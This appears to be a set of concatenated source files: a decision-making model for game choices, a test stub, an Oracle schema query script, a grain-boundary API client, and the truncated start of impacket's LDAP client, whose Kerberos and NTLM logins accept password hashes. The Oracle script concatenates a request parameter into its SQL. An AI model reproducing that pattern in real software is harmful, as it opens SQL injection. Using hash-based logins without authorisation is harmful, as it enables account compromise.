```
"maximizing"
```
"""
return self.name
def _unpack_(obj):
"""
The inverse of `pack`; creates a DecisionMethod from a simple object. This
method works for all of the various subclasses.
"""
if isinstance(obj, str) and hasattr(DecisionMethod, obj):
result = getattr(DecisionMethod, obj)
if isinstance(result, DecisionMethod):
return result
raise ValueError(
"Attempted to unpack unknown decision method '{}'.".format(obj)
)
def decide(self, decision):
"""
Overridden by subclasses to implement decision logic.
This method takes as input a Decision object which should have
prospective_impressions and goal_relevance defined (see
Decision.add_prospective_impressions). Missing goal saliences will be
treated as ones.
See also:
Decision.add_prospective_impressions
ModeOfEngagement.build_decision_model (engagement.py)
PriorityMethod.factor_decision_model (engagement.py)
"""
raise NotImplementedError(
"Use one of the DecisionMethod subclasses to make decisions, not "
"DecisionMethod itself!"
)
def consistency(self, decision):
"""
Overridden by subclasses to implement consistency logic.
Takes a Decision object that's already been decided, and returns a number
between 0 and 1 indicating how consistent the decision is with this
decision method.
The given decision must have an option specified and must include
prospective impression values.
"""
raise NotImplementedError(
"Use one of the DecisionMethod subclasses to test consistency, not "
"DecisionMethod itself!"
)
@utils.super_class_property()
class Maximizing(DecisionMethod):
"""
Using a maximizing decision method, options are compared in an attempt to
find one that's better than all of the rest. Lack of information and/or
tradeoffs can cause this attempt to fail, in which case resolution proceeds
arbitrarily.
"""
def __new__(cls):
return super().__new__(cls, "maximizing")
def decide(self, decision):
"""
See DecisionMethod.decide.
Computes pairwise rationales for picking each option over others and
randomly picks from dominating options.
"""
if not decision.prospective_impressions:
raise ValueError(
"Can't make a decision until prospective impressions have been added."
)
decision_model = decision.prospective_impressions
goal_relevance = decision.goal_relevance
# TODO: Implement this!
pass
def consistency(self, decision):
"""
See DecisionMethod.consistency.
Uses the dominance structure of pairwise rationales to compute consistency.
"""
if not decision.option:
raise ValueError(
"Can't compute decision consistency before an option has been selected."
)
if not decision.prospective_impressions:
raise ValueError(
"Can't compute decision consistency before prospective impressions are "
"added."
)
# TODO: Implement this!
pass
@utils.super_class_property()
class Satisficing(DecisionMethod):
"""
Using a satisficing decision method, options are inspected to find one that
achieves some kind of positive outcome, or failing that, a least-negative
outcome. Barring large differences, positive outcomes are all considered
acceptable, and an arbitrary decision is made between acceptable options.
"""
def __new__(cls):
return super().__new__(cls, "satisficing")
def decide(self, decision):
"""
See DecisionMethod.decide.
Computes risks for each option and picks randomly from options that fall
into a fuzzy best or least-bad group.
"""
if not decision.prospective_impressions:
raise ValueError(
"Can't make a decision until prospective impressions have been added."
)
decision_model = decision.prospective_impressions
goal_relevance = decision.goal_relevance
# TODO: Implement this!
pass
def consistency(self, decision):
"""
See DecisionMethod.consistency.
Uses option risks to evaluate consistency. TODO: More specific here.
"""
if not decision.option:
raise ValueError(
"Can't compute decision consistency before an option has been selected."
)
if not decision.prospective_impressions:
raise ValueError(
"Can't compute decision consistency before prospective impressions are "
"added."
)
# TODO: Implement this!
pass
@utils.super_class_property()
class Utilizing(DecisionMethod):
"""
Using a utilizing decision method, utilities are computed for each option by
multiplying probabilities and valences and summing across different outcomes
according to goal priorities. The option with the highest utility is chosen,
or one is selected randomly if there are multiple.
Note: this is a bullshit decision method which is numerically convenient but
not at all accurate.
Constants:
value_resolution:
determines the resolution at which utilities are considered
indistinguishable (unless one is positive/zero and the other is
negative/zero).
"""
value_resolution = 0.09
def __new__(cls):
return super().__new__(cls, "utilizing")
def rank_options(self, decision):
"""
Ranks the options at the given decision into multiple equivalence classes
ordered by preference. Returns an ordered list of pairs of (preference-
value, list-of-option-names). The given decision must include prospective
impressions.
"""
if not decision.prospective_impressions:
raise ValueError(
"Can't rank options until prospective impressions have been added."
)
decision_model = decision.prospective_impressions
goal_relevance = decision.goal_relevance
utilities = {}
for opt in decision_model:
# TODO: Does this work for options w/out any impressions?
utilities[opt] = 0
for goal in decision_model[opt]:
for pri in decision_model[opt][goal]:
utilities[opt] = utilities[opt] + float(
pri.utility() * (
goal_relevance[goal]
if goal in goal_relevance
else 1
)
)
ulevels = reversed(sorted(list(utilities.values())))
strict = [
[u, [ gn for (gn, uv) in utilities.items() if uv == u ]]
for u in ulevels
]
# Merge levels according to value_resolution
i = 0
while i < len(strict) - 1:
u1 = strict[i][0]
u2 = strict[i+1][0]
if u1 > 0 and u2 <= 0 or u1 >= 0 and u2 < 0:
i += 1
continue
if u1 - u2 < self.value_resolution:
u, ol = strict.pop(i)
strict[i][0] = (u1 + u2) / 2
strict[i][1].extend(ol)
continue # without incrementing i
# increment and continue
i += 1
return strict
def decide(self, decision):
"""
See DecisionMethod.decide.
Computes utilities for each option at a choice and returns a random option
from those tied for highest perceived utility.
"""
if not decision.prospective_impressions:
raise ValueError(
"Can't make a decision until prospective impressions have been added."
)
ranked = self.rank_options(decision)
best = ranked[0][1]
return random.choice(best)
def consistency(self, decision):
"""
See DecisionMethod.consistency.
Creates a utility scale based on the highest- and lowest-valued options at
this choice and interpolates according to the utility of the chosen option.
"""
if not decision.option:
raise ValueError(
"Can't compute decision consistency before an option has been selected."
)
if not decision.prospective_impressions:
raise ValueError(
"Can't compute decision consistency before prospective impressions are "
"added."
)
ranked = self.rank_options(decision)
best_utility = ranked[0][0]
worst_utility = ranked[-1][0]
lower_bound = -0.5 + worst_utility / 2
chosen_utility = None
for u, ol in ranked:
if decision.option.name in ol:
chosen_utility = u
break
if chosen_utility is None:
raise RuntimeError(
"Selected option '{}' wasn't found among ranked options!".format(
decision.option.name
)
)
# TODO: Something else here?
# TODO: Note that this isn't quite correct, because there should be more
# tolerance when the utility range is low, but figuring out what the
# threshold for "low" is is difficult.
#denom = float(best_utility) - float(worst_utility)
denom = float(best_utility) - float(lower_bound)
if denom == 0:
return 1.0 # all options are the same, so any choice is compatible
else:
# TODO: Which of these?!?
#return (chosen_utility - worst_utility) / (best_utility - worst_utility)
return (float(chosen_utility) - float(lower_bound)) / denom
@utils.super_class_property()
class Randomizing(DecisionMethod):
"""
Using a randomizing decision method, options are selected completely at
random.
"""
def __new__(cls):
return super().__new__(cls, "randomizing")
def decide(self, decision):
"""
See DecisionMethod.decide.
Selects a random option at the given choice, ignoring information about
perception of the choice.
This is just a baseline model.
"""
return random.choice(list(decision.choice.options.keys()))
def consistency(self, decision):
"""
See DecisionMethod.consistency.
Always returns 1, because every option is equally consistent with random
decision making.
"""
if not decision.option:
raise ValueError(
"Can't compute decision consistency before an option has been selected."
)
if not decision.prospective_impressions:
raise ValueError(
"Can't compute decision consistency before prospective impressions are "
"added."
)
return 1.0
class Decision:
"""
A decision is the act of picking an option at a choice, after which one
experiences an outcome. Note that the handling of extended/hidden/uncertain
outcomes is not yet implemented.
Decisions have information on both a player's prospective impressions of the
choice in question (as a decision model plus goal saliences) and their
retrospective impressions of the option they chose (as a mapping from goal
names to Retrospective percepts).
When a decision is created, it doesn't yet specify outcomes or retrospective
impressions (although the option that it is a decision for includes outcomes
that have probabilities). The "roll_outcomes" method can be used to
automatically sample a set of outcomes for an option.
"""
def __init__(
self,
choice,
option=None,
outcomes=None,
prospective_impressions=None,
factored_decision_models=None,
goal_relevance=None,
retrospective_impressions=None
):
"""
choice:
The choice that this object focuses on.
option:
The option the choosing of which this Decision represents. May be left
blank at first by passing in None.
outcomes:
A collection of Outcome objects; leave out to create a pre-outcome
decision. The special string "generate" can be used to automatically
generate outcomes; it just has the effect of calling roll_outcomes. Note
that "generate" may not be given when no option is specified (doing so
will result in a RuntimeError).
prospective_impressions:
A mapping from option names to mappings from goal names to prospective
impression lists, as returned by ModeOfEngagement.build_decision_model.
Can be created automatically along with the factored_decision_models and
goal_relevance properties if given as None using the
add_prospective_impressions method.
factored_decision_models:
This is just a list of one or more prospective impressions structures
(maps from option names to maps from goal names to impression lists).
The models are arranged such that the first model can be used to make
decisions, falling back to successive models in the case of a tie at an
upper level. Normally, this is given as None and assigned when
add_prospective_impressions is called.
goal_relevance:
A mapping from goal names to Salience values. This expresses the relative
importance of various goals at the moment of the decision, and is usually
given as None and assigned when add_prospective_impressions is called.
retrospective_impressions:
A mapping from goal names to lists of Retrospective impression objects.
Normally given as None and then assigned using the
add_retrospective_impressions method. Note that each goal may have
multiple associated impressions based on the various outcomes that
occurred. This only makes sense if the option for this Decision has been
chosen and outcomes have been rolled (see roll_outcomes).
"""
self.choice = choice
self.option = option
if isinstance(self.option, str):
self.option = self.choice.options[self.option] # look up within choice
self.outcomes = outcomes or {}
if self.outcomes == "generate":
self.roll_outcomes()
elif not isinstance(self.outcomes, dict):
utils.check_names(
self.outcomes,
"Two outcomes named '{{}}' cannot coexist within a Decision."
)
self.outcomes = {
o.name: o
for o in self.outcomes
}
self.prospective_impressions = prospective_impressions
self.factored_decision_models = factored_decision_models
self.goal_relevance = goal_relevance
self.retrospective_impressions = retrospective_impressions
if retrospective_impressions:
self.add_simplified_retrospectives()
else:
self.simplified_retrospectives = None
def __str__(self):
# TODO: Better here
return str(pack(self))
def _diff_(self, other):
"""
Reports differences (see diffable.py).
"""
return [
"choices: {}".format(d)
for d in diff(self.choice, other.choice)
] + [
"options: {}".format(d)
for d in diff(self.option, other.option)
] + [
"outcomes: {}".format(d)
for d in diff(self.outcomes, other.outcomes)
] + [
"prospectives: {}".format(d)
for d in diff(
self.prospective_impressions,
other.prospective_impressions
)
] + [
"factored decision models: {}".format(d)
for d in diff(
self.factored_decision_models,
other.factored_decision_models
)
] + [
"goal relevance: {}".format(d)
for d in diff(self.goal_relevance, other.goal_relevance)
] + [
"retrospectives: {}".format(d)
for d in diff(
self.retrospective_impressions,
other.retrospective_impressions
)
] + [
"simplified retrospectives: {}".format(d)
for d in diff(
self.simplified_retrospectives,
other.simplified_retrospectives
)
]
def __eq__(self, other):
if not isinstance(other, Decision):
return False
if other.choice != self.choice:
return False
if other.option != self.option:
return False
if other.outcomes != self.outcomes:
return False
if other.prospective_impressions != self.prospective_impressions:
return False
if other.factored_decision_models != self.factored_decision_models:
return False
if other.goal_relevance != self.goal_relevance:
return False
if other.retrospective_impressions != self.retrospective_impressions:
return False
if other.simplified_retrospectives != self.simplified_retrospectives:
return False
return True
def __hash__(self):
h = hash(self.choice)
h ^= hash(self.option)
for on in self.outcomes:
h ^= 583948 + hash(self.outcomes[on])
if self.prospective_impressions:
for on in self.prospective_impressions:
option_impressions = self.prospective_impressions[on]
oh = hash(on)
for gn in option_impressions:
h ^= 874387 + hash(tuple(option_impressions[gn])) + oh
if self.factored_decision_models:
for dm in self.factored_decision_models:
for on in dm:
option_impressions = dm[on]
oh = hash(on)
for gn in option_impressions:
h ^= 231893 + hash(tuple(option_impressions[gn])) + oh
if self.goal_relevance:
for gn in self.goal_relevance:
h ^= 3321564 + hash(gn) + hash(self.goal_relevance[gn])
if self.retrospective_impressions:
for gn in self.retrospective_impressions:
h ^= 67894 + hash(gn) + hash(tuple(self.retrospective_impressions[gn]))
if self.simplified_retrospectives:
for gn in self.simplified_retrospectives:
h ^= 848846 + hash(gn) + hash(self.simplified_retrospectives[gn])
return h
def _pack_(self):
"""
Packs this Decision into a simple object representation which can be
converted to JSON.
Example:
```
Decision(
Choice(
"Rescue the baby dragon or not?",
[
Option(
"rescue_it",
[
Outcome(
"bites_your_hand",
{
"health_and_safety": Valence("unsatisfactory"),
"befriend_dragon": Valence("unsatisfactory"),
},
Salience("implicit"),
Certainty("even"),
),
Outcome(
"appreciates_kindness",
{ "befriend_dragon": "good" },
"explicit",
"likely",
)
]
),
Option(
"leave_it",
[
Outcome(
"dislikes_abandonment",
{ "befriend_dragon": "bad" },
"explicit",
0.97,
),
Outcome(
"dies",
{
"befriend_dragon": "awful",
"kill_dragon": "great"
},
"hinted",
"unlikely",
actual_likelihood="even"
)
]
)
]
),
Option(
"rescue_it",
[
Outcome(
"bites_your_hand",
{
"health_and_safety": Valence("unsatisfactory"),
"befriend_dragon": Valence("unsatisfactory"),
},
Salience("implicit"),
Certainty("even"),
),
Outcome(
"appreciates_kindness",
{ "befriend_dragon": "good" },
"explicit",
"likely",
)
]
),
[
Outcome(
"appreciates_kindness",
{ "befriend_dragon": "good" },
"explicit",
"likely",
)
],
prospective_impressions=None,
factored_decision_models=None,
goal_relevance=None,
retrospective_impressions=None
)
```
{
"choice": {
"name": "Rescue the baby dragon or not?",
"options": {
"leave_it": {
"name": "leave_it",
"outcomes": [
{
"actual_likelihood": "even",
"apparent_likelihood": "unlikely",
"effects": {
"befriend_dragon": "awful",
"kill_dragon": "great"
},
"name": "dies",
"salience": "hinted"
},
{
"apparent_likelihood": 0.97,
"effects": {
"befriend_dragon": "bad"
},
"name": "dislikes_abandonment",
"salience": "explicit"
},
]
},
"rescue_it": {
"name": "rescue_it",
"outcomes": [
{
"apparent_likelihood": "likely",
"effects": {
"befriend_dragon": "good"
},
"name": "appreciates_kindness",
"salience": "explicit"
},
{
"apparent_likelihood": "even",
"effects": {
"befriend_dragon": "unsatisfactory",
"health_and_safety": "unsatisfactory"
},
"name": "bites_your_hand",
"salience": "implicit"
}
]
}
}
},
"option": {
"name": "rescue_it",
"outcomes": [
{
"apparent_likelihood": "likely",
"effects": {
"befriend_dragon": "good"
},
"name": "appreciates_kindness",
"salience": "explicit"
},
{
"apparent_likelihood": "even",
"effects": {
"befriend_dragon": "unsatisfactory",
"health_and_safety": "unsatisfactory"
},
"name": "bites_your_hand",
"salience": "implicit"
}
]
},
"outcomes": [
{
"apparent_likelihood": "likely",
"effects": {
"befriend_dragon": "good"
},
"name": "appreciates_kindness",
"salience": "explicit"
}
],
"prospective_impressions": None,
"factored_decision_models": None,
"goal_relevance": None,
"retrospective_impressions": None,
}
```
TODO: More examples!
"""
return {
"choice": pack(self.choice),
"option": pack(self.option),
"outcomes": [ pack(o) for o in self.outcomes.values() ],
"prospective_impressions": pack(self.prospective_impressions),
"factored_decision_models": pack(self.factored_decision_models),
"goal_relevance": pack(self.goal_relevance),
"retrospective_impressions": pack(self.retrospective_impressions),
# Note: no need to pack simplified retrospective impressions, as they'll
# be reconstructed from the full retrospectives.
}
def unpack_decision_model(dm):
"""
Helper method for _unpack_ that unpacks a decision model (a mapping from
option names to mappings from goal names to lists of Prospective
impressions).
"""
return {
optname: {
goalname: [
unpack(pri, perception.Prospective)
for pri in dm[optname][goalname]
]
for goalname in dm[optname]
}
for optname in dm
} if dm else None
def _unpack_(obj):
"""
The inverse of `_pack_`; creates a Decision from a simple object.
Note that the choice, option, and outcomes of this decision are new,
disentangled objects, so this it isn't terribly memory efficient to pack
and unpack Decision objects, and true linkage shouldn't be assumed.
"""
return Decision(
unpack(obj["choice"], choice.Choice),
unpack(obj["option"], choice.Option),
[ unpack(o, choice.Outcome) for o in obj["outcomes"] ],
Decision.unpack_decision_model(obj["prospective_impressions"]),
[
Decision.unpack_decision_model(dm)
for dm in obj["factored_decision_models"]
] if obj["factored_decision_models"] else None,
{
gn: unpack(obj["goal_relevance"][gn], Salience)
for gn in obj["goal_relevance"]
} if obj["goal_relevance"] else None,
{
gn: [
unpack(o, perception.Retrospective)
for o in obj["retrospective_impressions"][gn]
]
for gn in obj["retrospective_impressions"]
} if obj["retrospective_impressions"] else None
)
def select_option(self, selection):
"""
Selects a particular option at this choice, either via a string key or the
object itself.
"""
if isinstance(selection, str):
self.option = self.choice.options[selection]
elif isinstance(selection, choice.Option):
if selection not in self.choice.options.values():
raise ValueError(
"Can't select option {} which isn't part of choice {}.".format(
selection,
self.choice
)
)
self.option = self.choice.options[selection]
else:
raise TypeError(
"Can't select invalid option value {} of type {}.".format(
selection,
type(selection)
)
)
def roll_outcomes(self):
"""
Uses the actual_likelihood information from the Outcome objects included in
this decision's Option to sample a set of Outcomes and assigns those to
self.outcomes. Will raise a RuntimeError if an option hasn't been chosen.
"""
if not self.option:
raise RuntimeError(
"Can't roll outcomes for a decision before knowing which option was "
"selected."
)
self.outcomes = self.option.sample_outcomes()
def add_prospective_impressions(self, priority_method, mode_of_engagement):
"""
Adds prospective impressions
"""
if self.prospective_impressions != None or self.goal_relevance != None:
raise RuntimeError(
"Attempted to add prospective impressions to a decision which already "
"has them."
)
self.prospective_impressions = mode_of_engagement.build_decision_model(
self.choice
)
(
self.factored_decision_models,
self.goal_relevance
) = mode_of_engagement.get_factored_decision_model(
self.choice,
priority_method,
dm=self.prospective_impressions
)
def add_retrospective_impressions(self):
"""
Adds retrospective impressions based on the prospective impressions and
actual outcomes. Calls roll_outcomes if necessary.
"""
if (
self.retrospective_impressions != None
or self.simplified_retrospectives != None
):
raise RuntimeError(
"Attempted to add retrospective impressions to a decision which "
"already had them."
)
self.retrospective_impressions = {}
if not self.outcomes:
self.roll_outcomes()
chosen_prospectives = self.prospective_impressions[self.option]
# for each goal in prospective impressions for the chosen option
for goal in chosen_prospectives:
self.retrospective_impressions[goal] = []
# for each prospective impression of that goal
for pri in chosen_prospectives[goal]:
# sort through actual outcomes to find effects on that goal
for on in self.outcomes:
out = self.outcomes[on]
if goal in out.goal_effects:
# add a retrospective impression for each prospective/outcome pair
val = out.goal_effects[goal]
self.retrospective_impressions[goal].append(
perception.Retrospective(
goal=goal,
choice=self.choice.name,
option=self.option.name,
outcome=out.name,
prospective=pri,
salience=1.0, # TODO: retrospective saliences would hook in here
valence=val
)
)
# Also create bundled simplified retrospective impressions
self.add_simplified_retrospectives()
def add_simplified_retrospectives(self):
"""
Fills in simplified retrospective impressions from full retrospectives.
Normally it's not necessary to call this manually, and it's an error to
call it if simplified retrospectives have already been added.
"""
if self.simplified_retrospectives:
raise RuntimeError(
"Attempted to add simplified retrospectives to a decision which "
"already had them."
)
self.simplified_retrospectives = {}
for goal in self.retrospective_impressions:
ilist = self.retrospective_impressions[goal]
self.simplified_retrospectives[goal] = \
perception.Retrospective.merge_retrospective_impressions(ilist)
| StarcoderdataPython |
3471565 | <filename>Python/TurnTicketDispenser/test_turn_ticket.py
import unittest
from turn_ticket import TicketDispenser
class TicketDispenserTest(unittest.TestCase):
def test_do_something(self):
dispenser = TicketDispenser()
ticket = dispenser.getTurnTicket()
if __name__ == "__main__":
unittest.main() | StarcoderdataPython |
3479197 | <filename>survol/sources_types/oracle/schema/oracle_schema_package_bodies.py<gh_stars>1-10
#!/usr/bin/env python
"""
Oracle package bodies
"""
import sys
import logging
from lib_properties import pc
import lib_oracle
import lib_common
from sources_types.oracle import schema as oracle_schema
from sources_types.oracle import package_body as oracle_package_body
def Main():
cgiEnv = lib_oracle.OracleEnv()
ora_schema = cgiEnv.m_entity_id_dict["Schema"]
grph = cgiEnv.GetGraph()
sql_query = "SELECT OBJECT_NAME,STATUS,CREATED FROM ALL_OBJECTS WHERE OBJECT_TYPE = 'PACKAGE BODY' AND OWNER = '" + ora_schema + "'"
logging.debug("sql_query=%s", sql_query)
node_oraschema = oracle_schema.MakeUri(cgiEnv.m_oraDatabase, ora_schema)
result = lib_oracle.ExecuteQuery(cgiEnv.ConnectStr(), sql_query)
num_package_bodies = len(result)
logging.debug("num_package_bodies=%d", num_package_bodies)
for row in result:
package_body_name = str(row[0])
node_package_body = oracle_package_body.MakeUri(cgiEnv.m_oraDatabase, ora_schema, package_body_name)
grph.add((node_oraschema, pc.property_oracle_package_body, node_package_body))
lib_oracle.AddLiteralNotNone(grph, node_package_body, "Status", row[1])
lib_oracle.AddLiteralNotNone(grph, node_package_body, "Creation", row[2])
cgiEnv.OutCgiRdf("LAYOUT_RECT", [pc.property_oracle_package_body])
if __name__ == '__main__':
Main()
| StarcoderdataPython |
163121 | <reponame>jmmshn/api
from typing import List, Optional, Tuple
from collections import defaultdict
import warnings
from mp_api.core.client import BaseRester
from mp_api.gb.models import GBTypeEnum
class GBRester(BaseRester):
suffix = "gb"
def search_gb_docs(
self,
task_ids: Optional[List[str]] = None,
gb_energy: Optional[Tuple[float, float]] = None,
separation_energy: Optional[Tuple[float, float]] = None,
rotation_angle: Optional[Tuple[float, float]] = None,
sigma: Optional[int] = None,
type: Optional[GBTypeEnum] = None,
chemsys: Optional[str] = None,
num_chunks: Optional[int] = None,
chunk_size: int = 100,
fields: Optional[List[str]] = None,
):
"""
Query grain boundary docs using a variety of search criteria.
Arguments:
task_ids (List[str]): List of Materials Project IDs to query with.
gb_energy (Tuple[float,float]): Minimum and maximum grain boundary energy in J/m³ to consider.
separation_energy (Tuple[float,float]): Minimum and maximum work of separation energy in J/m³ to consider.
rotation_angle (Tuple[float,float]): Minimum and maximum rotation angle in degrees to consider.
sigma (int): Sigma value of grain boundary.
type (GBTypeEnum): Grain boundary type.
chemsys (str): Dash-delimited string of elements in the material.
num_chunks (int): Maximum number of chunks of data to yield. None will yield all possible.
chunk_size (int): Number of data entries per chunk.
fields (List[str]): List of fields in GBDoc to return data for.
Default is material_id only.
Yields:
([dict]) List of dictionaries containing data for entries defined in 'fields'.
Defaults to Materials Project IDs and last updated data.
"""
query_params = defaultdict(dict) # type: dict
if chunk_size <= 0 or chunk_size > 100:
warnings.warn("Improper chunk size given. Setting value to 100.")
chunk_size = 100
if task_ids:
query_params.update({"task_ids": ",".join(task_ids)})
if gb_energy:
query_params.update(
{"gb_energy_min": gb_energy[0], "gb_energy_max": gb_energy[1]}
)
if separation_energy:
query_params.update(
{
"w_sep_energy_min": separation_energy[0],
"w_sep_energy_max": separation_energy[1],
}
)
if rotation_angle:
query_params.update(
{
"rotation_angle_min": rotation_angle[0],
"rotation_angle_max": rotation_angle[1],
}
)
if sigma:
query_params.update({"sigma": sigma})
if type:
query_params.update({"type": type})
if chemsys:
query_params.update({"chemsys": chemsys})
if fields:
query_params.update({"fields": ",".join(fields)})
query_params = {
entry: query_params[entry]
for entry in query_params
if query_params[entry] is not None
}
query_params.update({"limit": chunk_size, "skip": 0})
count = 0
while True:
query_params["skip"] = count * chunk_size
results = self.query(query_params).get("data", [])
if not any(results) or (num_chunks is not None and count == num_chunks):
break
count += 1
yield results
| StarcoderdataPython |
6649157 | # Copyright (c) 2016 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Author: <NAME> (@agsolino)
#
# Description:
# RFC 4511 Minimalistic implementation. We don't need much functionality yet
# If we need more complex use cases we might opt to use a third party implementation
# Keep in mind the APIs are still unstable, might require to re-write your scripts
# as we change them.
# Adding [MS-ADTS] specific functionality
#
# ToDo:
# [ ] Implement Paging Search, especially important for big requests
#
import socket
import os
from binascii import unhexlify
from pyasn1.codec.der import decoder, encoder
from pyasn1.error import SubstrateUnderrunError
from impacket import LOG
from impacket.ldap.ldapasn1 import BindRequest, Integer7Bit, LDAPDN, AuthenticationChoice, AuthSimple, LDAPMessage, \
SCOPE_SUB, SearchRequest, Scope, DEREF_NEVER, DeRefAliases, IntegerPositive, Boolean, AttributeSelection, \
SaslCredentials, LDAPString, ProtocolOp, Credentials
from impacket.ntlm import getNTLMSSPType1, getNTLMSSPType3
from impacket.spnego import SPNEGO_NegTokenInit, TypesMech
try:
import OpenSSL
from OpenSSL import SSL, crypto
except:
LOG.critical("pyOpenSSL is not installed, can't continue")
raise
class LDAPConnection:
def __init__(self,url, baseDN='dc=net', dstIp = None):
"""
LDAPConnection class
:param string url:
:param string baseDN:
:param string dstIp:
:return: a LDAP instance, if not raises a LDAPSessionError exception
"""
self._SSL = False
self._dstPort = 0
self._dstHost = 0
self._socket = None
self._baseDN = baseDN
self._messageId = 1
self._dstIp = dstIp
if url.startswith("ldap://"):
self._dstPort = 389
self._SSL = False
self._dstHost = url[7:]
elif url.startswith("ldaps://"):
#raise LDAPSessionError(errorString = 'LDAPS still not supported')
self._dstPort = 636
self._SSL = True
self._dstHost = url[8:]
else:
raise LDAPSessionError(errorString = 'Unknown URL prefix %s' % url)
# Try to connect
if self._dstIp is not None:
targetHost = self._dstIp
else:
targetHost = self._dstHost
LOG.debug('Connecting to %s, port %s, SSL %s' % (targetHost, self._dstPort, self._SSL))
try:
af, socktype, proto, canonname, sa = socket.getaddrinfo(targetHost, self._dstPort, 0, socket.SOCK_STREAM)[0]
self._socket = socket.socket(af, socktype, proto)
except socket.error, e:
raise socket.error("Connection error (%s:%s)" % (targetHost, 88), e)
if self._SSL is False:
self._socket.connect(sa)
else:
# Switching to TLS now
ctx = SSL.Context(SSL.TLSv1_METHOD)
#ctx.set_cipher_list('RC4')
self._socket = SSL.Connection(ctx, self._socket)
self._socket.connect(sa)
self._socket.do_handshake()
def kerberosLogin(self, user, password, domain='', lmhash='', nthash='', aesKey='', kdcHost=None, TGT=None,
TGS=None, useCache=True):
"""
logins into the target system explicitly using Kerberos. Hashes are used if RC4_HMAC is supported.
:param string user: username
:param string password: <PASSWORD>
:param string domain: domain where the account is valid for (required)
:param string lmhash: LMHASH used to authenticate using hashes (password is not used)
:param string nthash: NTHASH used to authenticate using hashes (password is not used)
:param string aesKey: aes256-cts-hmac-sha1-96 or aes128-cts-hmac-sha1-96 used for Kerberos authentication
:param string kdcHost: hostname or IP Address for the KDC. If None, the domain will be used (it needs to resolve tho)
:param struct TGT: If there's a TGT available, send the structure here and it will be used
:param struct TGS: same for TGS. See smb3.py for the format
:param bool useCache: whether or not we should use the ccache for credentials lookup. If TGT or TGS are specified this is False
:return: True, raises a LDAPSessionError if error.
"""
if lmhash != '' or nthash != '':
if len(lmhash) % 2: lmhash = '0%s' % lmhash
if len(nthash) % 2: nthash = '0%s' % nthash
try: # just in case they were converted already
lmhash = unhexlify(lmhash)
nthash = unhexlify(nthash)
except:
pass
# Importing down here so pyasn1 is not required if kerberos is not used.
from impacket.krb5.ccache import CCache
from impacket.krb5.asn1 import AP_REQ, Authenticator, TGS_REP, seq_set
from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS
from impacket.krb5 import constants
from impacket.krb5.types import Principal, KerberosTime, Ticket
from pyasn1.codec.der import decoder, encoder
import datetime
if TGT is not None or TGS is not None:
useCache = False
if useCache is True:
try:
ccache = CCache.loadFile(os.getenv('KRB5CCNAME'))
except:
# No cache present
pass
else:
# retrieve user and domain information from CCache file if needed
if user == '' and len(ccache.principal.components) > 0:
user = ccache.principal.components[0]['data']
if domain == '':
domain = ccache.principal.realm['data']
LOG.debug("Using Kerberos Cache: %s" % os.getenv('KRB5CCNAME'))
principal = 'ldap/%s@%s' % (self._dstHost.upper(), domain.upper())
creds = ccache.getCredential(principal)
if creds is None:
# Let's try for the TGT and go from there
principal = 'krbtgt/%s@%s' % (domain.upper(), domain.upper())
creds = ccache.getCredential(principal)
if creds is not None:
TGT = creds.toTGT()
LOG.debug('Using TGT from cache')
else:
LOG.debug("No valid credentials found in cache. ")
else:
TGS = creds.toTGS()
LOG.debug('Using TGS from cache')
# First of all, we need to get a TGT for the user
userName = Principal(user, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
if TGT is None:
if TGS is None:
tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, password, domain, lmhash, nthash,
aesKey, kdcHost)
else:
tgt = TGT['KDC_REP']
cipher = TGT['cipher']
sessionKey = TGT['sessionKey']
if TGS is None:
serverName = Principal('ldap/%s' % self._dstHost,
type=constants.PrincipalNameType.NT_SRV_INST.value)
tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, domain, kdcHost, tgt, cipher,
sessionKey)
else:
tgs = TGS['KDC_REP']
cipher = TGS['cipher']
sessionKey = TGS['sessionKey']
# Let's build a NegTokenInit with a Kerberos REQ_AP
blob = SPNEGO_NegTokenInit()
# Kerberos
blob['MechTypes'] = [TypesMech['MS KRB5 - Microsoft Kerberos 5']]
# Let's extract the ticket from the TGS
tgs = decoder.decode(tgs, asn1Spec=TGS_REP())[0]
ticket = Ticket()
ticket.from_asn1(tgs['ticket'])
# Now let's build the AP_REQ
apReq = AP_REQ()
apReq['pvno'] = 5
apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)
opts = list()
apReq['ap-options'] = constants.encodeFlags(opts)
seq_set(apReq, 'ticket', ticket.to_asn1)
authenticator = Authenticator()
authenticator['authenticator-vno'] = 5
authenticator['crealm'] = domain
seq_set(authenticator, 'cname', userName.components_to_asn1)
now = datetime.datetime.utcnow()
authenticator['cusec'] = now.microsecond
authenticator['ctime'] = KerberosTime.to_asn1(now)
encodedAuthenticator = encoder.encode(authenticator)
# Key Usage 11
# AP-REQ Authenticator (includes application authenticator
# subkey), encrypted with the application session key
# (Section 5.5.1)
encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 11, encodedAuthenticator, None)
apReq['authenticator'] = None
apReq['authenticator']['etype'] = cipher.enctype
apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator
blob['MechToken'] = encoder.encode(apReq)
# Done with the Kerberos saga, now let's get into LDAP
bindRequest = BindRequest()
bindRequest['version'] = Integer7Bit(3)
bindRequest['name'] = LDAPDN(user)
credentials = SaslCredentials()
credentials['mechanism'] = LDAPString('GSS-SPNEGO')
credentials['credentials'] = Credentials(blob.getData())
bindRequest['authentication'] = AuthenticationChoice().setComponentByName('sasl', credentials)
resp = self.sendReceive('bindRequest', bindRequest)[0]['protocolOp']
if resp['bindResponse']['resultCode'] != 0:
raise LDAPSessionError(errorString='Error in bindRequest -> %s:%s' % (
resp['bindResponse']['resultCode'].prettyPrint(), resp['bindResponse']['diagnosticMessage']))
return True
def login(self, user='', password='', domain = '', lmhash = '', nthash = '', authenticationChoice = 'sicilyNegotiate'):
"""
logins into the target system
:param string user: username
:param string password: <PASSWORD> the <PASSWORD>
:param string domain: domain where the account is valid for
:param string lmhash: LMHASH used to authenticate using hashes (password is not used)
:param string nthash: NTHASH used to authenticate using hashes (password is not used)
:param string authenticationChoice: type of authentication protocol to use (default NTLM)
:return: True, raises a LDAPSessionError if error.
"""
bindRequest = BindRequest()
bindRequest['version'] = Integer7Bit(3)
bindRequest['name'] = LDAPDN(user)
if authenticationChoice == 'simple':
